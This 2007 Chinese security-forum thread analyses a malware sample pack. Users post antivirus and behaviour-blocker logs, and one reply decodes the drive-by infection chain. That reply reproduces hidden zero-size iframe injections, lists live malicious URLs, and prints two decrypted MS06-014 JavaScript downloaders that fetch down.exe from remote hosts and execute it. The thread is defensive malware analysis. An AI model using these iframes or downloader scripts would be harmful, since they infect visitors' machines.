毒网，谁来分析下

显示全部楼层 · 发表于 2007-5-11 11:40:30

卡6 怎么没有反应呀

显示全部楼层 · 发表于 2007-5-11 11:47:45

Begin scan in 'D:\Documents and Settings\dell\桌面\hua.rar'
D:\Documents and Settings\dell\桌面\hua.rar
  [0] Archive type: RAR
  --> hua.exe
   [DETECTION] Contains suspicious code HEUR/Malware
   [INFO]    The file was deleted!

End of the scan: 2007年5月11日  11:45
Used time: 00:07 min

The scan has been done completely.

   0 Scanning directories
   2 Files were scanned
   1 viruses and/or unwanted programs were found
   1 classified as suspicious:
   1 files were deleted
   0 files were repaired
   0 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   0 Files not concerned
   1 Archives were scanned
   0 Warnings

显示全部楼层 · 发表于 2007-5-11 12:09:04

显示全部楼层 · 发表于 2007-5-11 12:15:31

2007-5-11 12:14:56 Safe'n'Sec 扫描报告

2007-5-11 12:14:56 扫描开始时间: 2007-5-11 12:14:56

2007-5-11 12:14:56 恶意软件处理:
2007-5-11 12:14:56 扫描级别: 完全

2007-5-11 12:15:03 D:\新建文件夹\down.exe 被感染 Win32.Worm.Delf.NCS 删除
2007-5-11 12:15:03 D:\新建文件夹\hua.exe 被感染 BehavesLike:Win32.ExplorerHijack 删除
2007-5-11 12:15:06 D:\新建文件夹\m2005.bmp 被感染 Exploit.Win32.MS05-002.Gen 删除
2007-5-11 12:15:06 D:\新建文件夹\m2006.bmp 被感染 Exploit.Win32.MS05-002.Gen 删除
2007-5-11 12:15:06 D:\新建文件夹\1.jpg 被感染 Exploit.Win32.MS05-002.Gen 删除
2007-5-11 12:15:06 D:\新建文件夹\2.jpg 被感染 Exploit.Win32.MS05-002.Gen 删除
2007-5-11 12:15:06 D:\新建文件夹\d.jpg 被感染 Exploit.Win32.MS05-002.Gen 删除
2007-5-11 12:15:06 D:\新建文件夹\xskj.jpg 被感染 Exploit.Win32.MS05-002.Gen 删除
2007-5-11 12:15:06 扫描区域:

2007-5-11 12:15:06 D:\新建文件夹
2007-5-11 12:15:06
2007-5-11 12:15:06 已扫描对象: 9
2007-5-11 12:15:06 已发现恶意对象: 8
2007-5-11 12:15:06 已删除恶意对象: 8

2007-5-11 12:15:06 扫描完成时间: 2007-5-11 12:15:06

显示全部楼层 · 发表于 2007-5-11 12:39:05

2007-5-11 12:36:05 !**************************************************
Safe'n'Sec 警报
行为
日期和时间: 2007-5-11 12:34:57
类型: 添加一个新的系统服务
风险: 中等

行为控制规则
名称:

程序
PID: 2672
PPID: 432
UID: JLJ\jljqq
文件: E:\下载\DOWNLOADS\HUA.EXE

服务
名称: WINDOWSDOWN
描述: WORD
类型: 272
启动类型: 2
文件: C:\WINDOWS\SYSTEM32\SERVET.EXE
依存关系:
用户:
用户操作: 阻止, 记住此次选择此次对话期间
阻止后终止程序
***************************************************
2007-5-11 12:37:04 !**************************************************
Safe'n'Sec 警报
行为
日期和时间: 2007-5-11 12:36:28
类型: 添加一个新的系统服务
风险: 中等

行为控制规则
名称:

程序
PID: 3416
PPID: 432
UID: JLJ\jljqq
文件: E:\下载\DOWNLOADS\SMDD.EXE

服务
名称: WINDOWS XP
描述: WINDOWS XP
类型: 272
启动类型: 2
文件: C:\WINDOWS\SYSTEM\EXPLORER
依存关系:
用户:
用户操作: 阻止, 记住此次选择此次对话期间
阻止后终止程序
***************************************************

显示全部楼层 · 发表于 2007-5-11 12:52:41

BD 8个
C:\Documents and Settings\sui\桌面\Downloads.rar=>down.exe 感染: Win32.Worm.Delf.NCS
C:\Documents and Settings\sui\桌面\Downloads.rar=>down.exe 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>down.exe 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>hua.exe 感染: BehavesLike:Win32.ExplorerHijack
C:\Documents and Settings\sui\桌面\Downloads.rar=>hua.exe 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>hua.exe 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2005.bmp 感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2005.bmp 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2005.bmp 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2006.bmp 感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2006.bmp 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2006.bmp 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>1.jpg 感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>1.jpg 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>1.jpg 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>2.jpg 感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>2.jpg 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>2.jpg 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>d.jpg 感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>d.jpg 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>d.jpg 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>xskj.jpg 感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>xskj.jpg 杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>xskj.jpg 删除
C:\Documents and Settings\sui\桌面\Downloads.rar Archive repacking has failed (marked actions not taken)

显示全部楼层 · 发表于 2007-5-11 13:28:33

解密这种粗活还是我来吧

——————————————————————————————————————————————————————

<iframe src=http://remix2008.myrice.com/gz.htm width=0 height=0></iframe>
<iframe src="http://www.hao123hao123.cn/ok/index.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.66ki.cn/index.htm width=100 height=0></iframe>

——————————————————————————————————————————————————————

http://remix2008.myrice.com/gz.htm：
MS06-014+ANI网马，挂了：
http://remix2008.myrice.com/m2006.bmp
指向于：http://remix2008.myrice.com/smdd.exe

里面还有<iframe src=http://remix2008.myrice.com/gz2.htm width=0 height=0></iframe>
同样是MS06-014+ANI网马：
http://remix2008.myrice.com/m2005.bmp
挂上了：http://remix2008.myrice.com/web.exe

——————————————————————————————————————————————————————

http://www.hao123hao123.cn/ok/index.htm：
指向了： <iframe src="http://www.qq881.cn/bbs/1881.htm" width="0" height="0" frameborder="0"></iframe>
里面有三个：
<iframe src="http://www.955922.cn/web.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.ip528.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.chammm.cn/index.htm" width="0" height="0" frameborder="0"></iframe>

第一、http://www.955922.cn/web.htm：
指向http://www.18dmm.com/dm/kehu0738.htm
用编码加密，转换为GB2312后可得源代码：里面有两个ANI的：
http://18dmm.com/arp/1.jpg
http://18dmm.com/arp/2.jpg
再挂上一个网页http://www.18dmm.com/arp/0614.htm，解密得：

function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}try{aaa="obj";bbb="ect";ccc="Adodb.";ddd="Stream";eee="Microsoft.";fff="XMLHTTP";lj='http://www.18dmm.com/arp/down.exe'; var df=document.createElement(aaa+bbb); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject(eee+fff,""); var S=df.CreateObject(ccc+ddd,""); S.type=1; x.open("GET", lj,0); x.send(); mz1=gn(1000); var F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder(0);var t2;t2=F.BuildPath(tmp,"rising"+mz1);mz1= F.BuildPath(tmp,mz1);S.Open();S.Write(x.responseBody);S.SaveToFile(mz1,2);S.Close();F.MoveFile(mz1,t2);var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+t2,"","open",0);}catch(i){i=1;}

复制代码

和上面的两个ANI一样都是挂了：http://www.18dmm.com/arp/down.exe；

第二、http://www.ip528.cn/：
指向了：http://www.08325.cn/wm/xin4.htm?110；
ANI一个：http://www.08325.cn/wm/d.jpg，
还有一个加密的MS06-014：http://www.08325.cn/wm/0614.js，解密得：

function gn(n) { var number = Math.random()*n; return '~tmp'+'.tmp'; } try { dl='http://www.08325.cn/wm/down.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }

复制代码

和上面的ANI一样是挂了：http://www.08325.cn/wm/down.exe；

第三、http://www.chammm.cn/index.htm：
指向了：http://s.gcuj.com/bd.htm?268002，
ANI一个：http://s.gcuj.com/t.js，
外加MS06-14一个：http://s.gcuj.com/1.htm，
都是挂了：http://t.gcuj.com/0.exe；

——————————————————————————————————————————————————————

http://www.n85853.cn/index.htm ：
指向了：http://www.chenxinsms.com；里面又有两个：
<iframe src="http://www.bz1000y.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.1008y.cn/" width="0" height="0" frameborder="0"></iframe>

第一、http://www.bz1000y.cn/：
指向了：http://www.08325.cn/wm/xin4.htm?666，和上面的http://www.08325.cn/wm/xin4.htm?110是一样的；

第二、http://www.1008y.cn/
指向了：http://www.18dmm.com/dm/kehu0749.htm?001，也是和上面的http://www.18dmm.com/dm/kehu0738.htm是一样的

——————————————————————————————————————————————————————

http://www.66ki.cn/index.htm：
又是ANI一个：http://www.66ki.cn/xskj.jpg，还有一个MS06-014：http://www.66ki.cn/news.htm，两个都挂上了http://www.66ki.cn/hua.exe；

——————————————————————————————————————————————————————

一堆东西，麻烦！另外ANI+MS06-014已经成为了网页挂马的主流了

——————————————————————————————————————————————————————

上文中出现的ANI+MS06-014网马文件：
http://remix2008.myrice.com/gz.htm
http://remix2008.myrice.com/gz2.htm
http://remix2008.myrice.com/m2006.bmp
http://remix2008.myrice.com/m2005.bmp
http://www.18dmm.com/dm/kehu0738.htm
http://18dmm.com/arp/1.jpg
http://18dmm.com/arp/2.jpg
http://www.18dmm.com/arp/0614.htm
http://www.08325.cn/wm/d.jpg
http://www.08325.cn/wm/0614.js
http://s.gcuj.com/t.js
http://s.gcuj.com/1.htm
http://www.08325.cn/wm/xin4.htm?666
http://www.18dmm.com/dm/kehu0749.htm?001
http://www.66ki.cn/xskj.jpg
http://www.66ki.cn/news.htm

上文中出现的挂病毒主文件：
http://remix2008.myrice.com/smdd.exe
http://remix2008.myrice.com/web.exe
http://www.18dmm.com/arp/down.exe
http://www.08325.cn/wm/down.exe
http://t.gcuj.com/0.exe
http://www.66ki.cn/hua.exe

[ 本帖最后由 dikex 于 2007-5-11 13:30 编辑 ]

显示全部楼层 · 发表于 2007-5-11 13:30:25

Scan performed at: 2007-5-11 13:30:29
Scanning Log
NOD32 version 2256 (20070510) NT
Command line: C:\Documents and Settings\EQ2\桌面\Downloads
Operating memory - is OK

Date: 11.5.2007 Time: 13:30:33
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\Downloads\
C:\Documents and Settings\EQ2\桌面\Downloads\1.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\2.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\d.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\down.exe - a variant of Win32/TrojanDownloader.Delf.BHO trojan
C:\Documents and Settings\EQ2\桌面\Downloads\hua.exe - a variant of Win32/TrojanDownloader.Delf.BHO trojan
C:\Documents and Settings\EQ2\桌面\Downloads\m2005.bmp - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\m2006.bmp - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\xskj.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
Number of scanned files: 9
Number of threats found: 8
Number of files cleaned: 8
Time of completion: 13:30:35 Total scanning time: 2 sec (00:00:02)

显示全部楼层 · 发表于 2007-5-11 15:54:11

A-Squared  Found nothing
AntiVir  Found TR/Delphi.Downloader.Gen, TR/Dldr.Delf.bkg, BDS/Hupigon.Gen, EXP/Ani.Gen
ArcaVir  Found nothing
Avast  Found CVE-2007-0038
AVG Antivirus  Found BackDoor.Generic6.KTC
BitDefender  Found Win32.Worm.Delf.NCS, BehavesLike:Win32.ExplorerHijack, Exploit.Win32.MS05-002.Gen (probable variant)
ClamAV  Found Worm.Delf-41
Dr.Web  Found Win32.HLLW.Autoruner, WIN.WORM.Virus, Exploit.ANIFile (probable variant)
F-Prot Antivirus  Found Possibly a new variant of W32/CrazyCrunch-based!Maximus
F-Secure Anti-Virus  Found Worm.Win32.Delf.bs, Trojan-Downloader.Win32.Delf.bkg, Backdoor.Win32.Hupigon.ete, Exploit.Win32.IMG-ANI.k, Exploit.Win32.IMG-ANI.ac, Exploit.Win32.IMG-ANI.gen, Exploit.Win32.IMG-ANI.x (probable variant)
Fortinet  Found W32/ANI07.A!exploit
Kaspersky Anti-Virus  Found Worm.Win32.Delf.bs, Trojan-Downloader.Win32.Delf.bkg, Backdoor.Win32.Hupigon.ete, Exploit.Win32.IMG-ANI.k, Exploit.Win32.IMG-ANI.ac, Exploit.Win32.IMG-ANI.gen, Exploit.Win32.IMG-ANI.x (probable variant)
NOD32  Found a variant of Win32/TrojanDownloader.Delf.BHO, a variant of Win32/TrojanDownloader.Ani.Gen
Norman Virus Control  Found nothing
Panda Antivirus  Found Trj/Downloader.OCR
Rising Antivirus  Found Hack.Exploit.RIFF.a
VirusBuster  Found Packed/Upack, Exploit.ANIFile.Gen, Exploit.ANIFile.L
VBA32  Found Trojan-Dropper.Agent.35, Exploit.Signature (probable variant)

显示全部楼层 · 发表于 2007-5-11 23:52:37

PCC 殺六支

[病毒样本] 毒网，谁来分析下

红伞没解压，启发

本帖子中包含更多资源